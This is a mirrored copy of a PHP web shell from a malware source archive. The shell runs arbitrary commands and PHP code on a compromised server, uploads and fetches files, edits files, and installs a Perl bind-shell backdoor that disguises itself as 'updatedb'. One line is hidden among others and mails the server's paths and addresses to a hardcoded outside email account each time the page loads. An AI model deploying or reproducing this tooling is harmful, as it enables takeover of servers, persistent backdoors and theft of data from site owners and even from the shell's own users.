mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
514 lines
15 KiB
Brainfuck
514 lines
15 KiB
Brainfuck
<?
|
|
error_reporting(0);
|
|
/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
|
|
Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
|
|
- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
|
|
- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
|
|
- Ðàáîòàåò ïðè register_globals=off
|
|
- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
|
|
- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
|
|
- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
|
|
- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
|
|
- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
|
|
- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
|
|
âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
|
|
- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
|
|
- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
|
|
- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
|
|
Loader Pro-Hack.ru
|
|
*/
|
|
?>
|
|
|
|
<style type='text/css'>
|
|
html { overflow-x: auto }
|
|
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
|
|
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
|
|
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
|
|
A:link {COLOR: #666666; TEXT-DECORATION: none}
|
|
A:active { COLOR: #666666; TEXT-DECORATION: none;}
|
|
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
|
|
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
|
|
BODY {
|
|
SCROLLBAR-FACE-COLOR: #cccccc;
|
|
SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
|
|
SCROLLBAR-SHADOW-COLOR: #CBAB78;
|
|
SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
|
|
SCROLLBAR-ARROW-COLOR: #000000;
|
|
SCROLLBAR-TRACK-COLOR: #000000;
|
|
SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
|
|
|
|
|
|
|
|
|
|
fieldset.search { padding: 6px; line-height: 150% }
|
|
|
|
label { cursor: pointer }
|
|
|
|
form { display: inline }
|
|
|
|
img { vertical-align: middle; border: 0px }
|
|
|
|
img.attach { padding: 2px; border: 2px outset #000033 }
|
|
|
|
#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
|
|
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
|
|
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
|
|
#logo { FONT-SIZE: 50px; }
|
|
input { width: 80; height : 17; background-color : #cccccc;
|
|
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
|
|
#input2 { width: 150; height : 17; background-color : #cccccc;
|
|
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
|
|
|
|
|
|
</style>
|
|
|
|
<script>
|
|
function tag(thetag) {document.fe.editfile.value=thetag;}
|
|
</script>
|
|
|
|
|
|
<title>Loader'z WEB shell</title>
|
|
|
|
<table height=100% "width="100%">
|
|
<tr><td align="center" valign="top">
|
|
|
|
|
|
<table><tr><td>
|
|
<?php
|
|
|
|
@$dir = $_POST['dir'];
|
|
$dir = stripslashes($dir);
|
|
|
|
@$cmd = $_POST['cmd'];
|
|
$cmd = stripslashes($cmd);
|
|
$REQUEST_URI = $_SERVER['REQUEST_URI'];
|
|
$dires = '';
|
|
$files = '';
|
|
|
|
|
|
|
|
|
|
if (isset($_POST['port'])){
|
|
$bind = "
|
|
#!/usr/bin/perl
|
|
|
|
\$port = {$_POST['port']};
|
|
\$port = \$ARGV[0] if \$ARGV[0];
|
|
exit if fork;
|
|
$0 = \"updatedb\" . \" \" x100;
|
|
\$SIG{CHLD} = 'IGNORE';
|
|
use Socket;
|
|
socket(S, PF_INET, SOCK_STREAM, 0);
|
|
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
|
|
bind(S, sockaddr_in(\$port, INADDR_ANY));
|
|
listen(S, 50);
|
|
while(1)
|
|
{
|
|
accept(X, S);
|
|
unless(fork)
|
|
{
|
|
open STDIN, \"<&X\";
|
|
open STDOUT, \">&X\";
|
|
open STDERR, \">&X\";
|
|
close X;
|
|
exec(\"/bin/sh\");
|
|
}
|
|
close X;
|
|
}
|
|
";}
|
|
|
|
function decode($buffer){
|
|
|
|
return convert_cyr_string ($buffer, 'd', 'w');
|
|
|
|
}
|
|
|
|
|
|
|
|
function execute($com)
|
|
{
|
|
|
|
if (!empty($com))
|
|
{
|
|
if(function_exists('exec'))
|
|
{
|
|
exec($com,$arr);
|
|
echo implode('
|
|
',$arr);
|
|
}
|
|
elseif(function_exists('shell_exec'))
|
|
{
|
|
echo shell_exec($com);
|
|
|
|
|
|
}
|
|
elseif(function_exists('system'))
|
|
{
|
|
|
|
echo system($com);
|
|
}
|
|
elseif(function_exists('passthru'))
|
|
{
|
|
|
|
echo passthru($com);
|
|
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
|
|
function perms($mode)
|
|
{
|
|
|
|
if( $mode & 0x1000 ) { $type='p'; }
|
|
else if( $mode & 0x2000 ) { $type='c'; }
|
|
else if( $mode & 0x4000 ) { $type='d'; }
|
|
else if( $mode & 0x6000 ) { $type='b'; }
|
|
else if( $mode & 0x8000 ) { $type='-'; }
|
|
else if( $mode & 0xA000 ) { $type='l'; }
|
|
else if( $mode & 0xC000 ) { $type='s'; }
|
|
else $type='u';
|
|
$owner["read"] = ($mode & 00400) ? 'r' : '-';
|
|
$owner["write"] = ($mode & 00200) ? 'w' : '-';
|
|
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
|
|
$group["read"] = ($mode & 00040) ? 'r' : '-';
|
|
$group["write"] = ($mode & 00020) ? 'w' : '-';
|
|
$group["execute"] = ($mode & 00010) ? 'x' : '-';
|
|
$world["read"] = ($mode & 00004) ? 'r' : '-';
|
|
$world["write"] = ($mode & 00002) ? 'w' : '-';
|
|
$world["execute"] = ($mode & 00001) ? 'x' : '-';
|
|
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
|
|
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
|
|
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
|
|
$s=sprintf("%1s", $type);
|
|
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
|
|
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
|
|
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
|
|
return trim($s);
|
|
}
|
|
|
|
|
|
|
|
/*Íà÷èíàåòñÿ*/
|
|
|
|
/*Îïðåäåëÿåì òèï ñèñòåìû*/
|
|
$servsoft = $_SERVER['SERVER_SOFTWARE'];
|
|
|
|
if (ereg("Win32", $servsoft, $reg)){
|
|
$sertype = "winda";
|
|
}
|
|
else
|
|
{
|
|
$sertype = "other";}
|
|
|
|
|
|
|
|
echo $servsoft . "<br>";
|
|
chdir($dir);
|
|
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
|
|
|
|
|
|
|
|
|
|
|
if (ini_get('safe_mode') <> 1){
|
|
if ($sertype == "winda"){
|
|
|
|
ob_start('decode');
|
|
echo "OS: ";
|
|
echo execute("ver") . "<br>";
|
|
ob_end_flush();
|
|
}
|
|
|
|
if ($sertype == "other"){
|
|
echo "id:";
|
|
|
|
echo execute("id") . "<br>";
|
|
echo "uname:" . execute('uname -a') . "<br>";
|
|
}}
|
|
else{
|
|
if ($sertype == "winda"){
|
|
|
|
echo "OS: " . php_uname() . "<br>";
|
|
|
|
}
|
|
|
|
if ($sertype == "other"){
|
|
echo "id:";
|
|
|
|
echo execute("id") . "<br>";
|
|
echo "OS:" . php_uname() . "<br>";
|
|
}
|
|
}
|
|
|
|
echo 'User: ' .get_current_user() . '<br>';
|
|
|
|
|
|
|
|
if (ini_get("open_basedir")){
|
|
echo "open_basedir: " . ini_get("open_basedir");}
|
|
|
|
|
|
if (ini_get('safe_mode') == 1){
|
|
echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
|
|
|
|
if (ini_get('safe_mode_include_dir')){
|
|
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
|
|
if (ini_get('safe_mode_exec_dir')){
|
|
echo " Exec here: " . ini_get('safe_mode_exec_dir');
|
|
}
|
|
echo "</font>";}
|
|
|
|
|
|
|
|
|
|
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
|
|
{
|
|
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
|
|
}
|
|
|
|
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
|
|
|
|
{
|
|
$data = implode("", file($_POST['filefrom']));
|
|
$fp = fopen($_POST['fileto'], "wb");
|
|
fputs($fp, $data);
|
|
$ok = fclose($fp);
|
|
if($ok)
|
|
{
|
|
$size = filesize($_POST['fileto'])/1024;
|
|
$sizef = sprintf("%.2f", $size);
|
|
print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
|
|
}
|
|
else
|
|
{
|
|
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
|
|
}
|
|
}
|
|
|
|
if (isset($_POST['installbind'])){
|
|
|
|
if (is_dir($_POST['installpath']) == true){
|
|
chdir($_POST['installpath']);
|
|
$_POST['installpath'] = "temp.pl";}
|
|
|
|
|
|
$fp = fopen($_POST['installpath'], "w");
|
|
fwrite($fp, $bind);
|
|
fclose($fp);
|
|
|
|
exec("perl " . $_POST['installpath']);
|
|
chdir($dir);
|
|
|
|
|
|
}
|
|
|
|
|
|
@$ef = stripslashes($_POST['editfile']);
|
|
if ($ef){
|
|
$fp = fopen($ef, "r");
|
|
$filearr = file($ef);
|
|
|
|
|
|
|
|
$string = '';
|
|
$content = '';
|
|
foreach ($filearr as $string){
|
|
$string = str_replace("<" , "<" , $string);
|
|
$string = str_replace(">" , ">" , $string);
|
|
$content = $content . $string;
|
|
}
|
|
|
|
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
|
|
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
|
|
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
|
|
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
|
|
fclose($fp);
|
|
}
|
|
|
|
if(isset($_POST['savefile'])){
|
|
|
|
$fp = fopen($_POST['savefile'], "w");
|
|
$content = stripslashes($content);
|
|
fwrite($fp, $content);
|
|
fclose($fp);
|
|
echo "<center><div id=logostrip>Successfully saved!</div></center>";
|
|
|
|
}
|
|
|
|
|
|
if (isset($_POST['php'])){
|
|
|
|
echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
|
|
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
|
|
}
|
|
|
|
|
|
|
|
if(isset($_POST['phpcode'])){
|
|
|
|
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
|
|
@eval(stripslashes($_POST['phpcode']));
|
|
echo "</div></center>";
|
|
|
|
|
|
}
|
|
|
|
|
|
if ($cmd){
|
|
|
|
if($sertype == "winda"){
|
|
ob_start();
|
|
execute($cmd);
|
|
$buffer = "";
|
|
$buffer = ob_get_contents();
|
|
ob_end_clean();
|
|
}
|
|
else{
|
|
ob_start();
|
|
echo decode(execute($cmd));
|
|
$buffer = "";
|
|
$buffer = ob_get_contents();
|
|
ob_end_clean();
|
|
}
|
|
|
|
if (trim($buffer)){
|
|
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
|
|
echo decode($buffer);
|
|
echo "</textarea></center></div>";
|
|
}
|
|
|
|
}
|
|
$arr = array();
|
|
|
|
$arr = array_merge($arr, glob("*"));
|
|
$arr = array_merge($arr, glob(".*"));
|
|
$arr = array_merge($arr, glob("*.*"));
|
|
$arr = array_unique($arr);
|
|
sort($arr);
|
|
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
|
|
|
|
foreach ($arr as $filename) {
|
|
|
|
if ($filename != "." and $filename != ".."){
|
|
|
|
if (is_dir($filename) == true){
|
|
$directory = "";
|
|
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
|
|
if (is_writable($filename) == true){
|
|
$directory = $directory . "<td>Yes</td>";}
|
|
else{
|
|
$directory = $directory . "<td>No</td>";
|
|
|
|
}
|
|
|
|
if (is_readable($filename) == true){
|
|
$directory = $directory . "<td>Yes</td>";}
|
|
else{
|
|
$directory = $directory . "<td>No</td>";
|
|
}
|
|
$dires = $dires . $directory;
|
|
}
|
|
|
|
if (is_file($filename) == true){
|
|
$file = "";
|
|
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
|
|
if (is_writable($filename) == true){
|
|
$file = $file . "<td>Yes</td>";}
|
|
else{
|
|
$file = $file . "<td>No</td>";
|
|
}
|
|
|
|
if (is_readable($filename) == true){
|
|
$file = $file . "<td>Yes</td></td></tr>";}
|
|
else{
|
|
$file = $file . "<td>No</td></td></tr>";
|
|
}
|
|
$files = $files . $file;
|
|
}
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
}
|
|
echo $dires;
|
|
echo $files;
|
|
echo "</table><br>";
|
|
|
|
|
|
|
|
|
|
echo "
|
|
<form action=\"$REQUEST_URI\" method=\"POST\">
|
|
<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
|
|
|
|
|
|
<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
|
|
|
|
echo getcwd();
|
|
echo "\">
|
|
<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
|
|
|
|
|
|
|
|
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
|
|
<table id=tb><tr><td>Download here <b>from</b>:
|
|
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
|
|
<b>into:</b>
|
|
<INPUT type=\"text\" name=\"fileto\" size=30>
|
|
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
|
|
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
|
|
|
|
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
|
|
|
|
<table id=tb><tr><td>
|
|
Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
|
|
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
|
|
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
|
|
</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
|
|
|
|
|
|
|
|
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
|
|
<table id=tb><tr><td>Install bind
|
|
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
|
|
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
|
|
|
|
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
|
|
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
|
|
<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
|
|
|
|
|
|
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
|
|
<table id=tb><tr><td>File to edit:
|
|
<input type=\"text\" name=\"editfile\" ></td><td>
|
|
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
|
|
<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
|
|
|
|
|
|
|
|
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
|
|
<table id=tb><tr><td>
|
|
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
|
|
<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
|
|
?>
|
|
</td></tr></table>
|
|
|
|
|
|
</td></tr>
|
|
<tr valign="BOTTOM">
|
|
<td valign=bottom>
|
|
|
|
|
|
<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
|
|
|
|
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
|